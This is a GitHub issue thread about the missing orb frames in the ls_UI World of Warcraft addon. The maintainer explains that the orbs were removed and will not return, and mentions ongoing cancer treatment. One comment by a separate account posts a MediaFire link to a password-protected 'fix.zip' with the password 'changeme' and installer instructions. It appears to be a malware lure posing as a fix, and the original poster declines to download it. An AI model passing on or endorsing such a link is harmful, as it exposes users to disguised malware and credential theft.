### ISSUE TITLE
what happpend to the orbs ?

### ISSUE THREAD

**Issue by marulol** [ls-/ls_UI#83]
I used this addon in bfa and my ui had big orbs where they at??

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by marulol** [comment]
Im not downloading an installer for an addon.

**Comment by ls-** [comment]
That name in the context of orbs, lol. Sadly, I nuked them at the start of the DF, so they've been gone for quite a while.

At this point them making a comeback even as a separate UI is extremely unlike. Even the more popular rectangular unit frames are niche af. And I'm deal with cancer rn, literally had another surgery yesterday and had a bunch of shit cut out of me, so I don't need more work on my plate at this point.

Don't take it personally, soz.
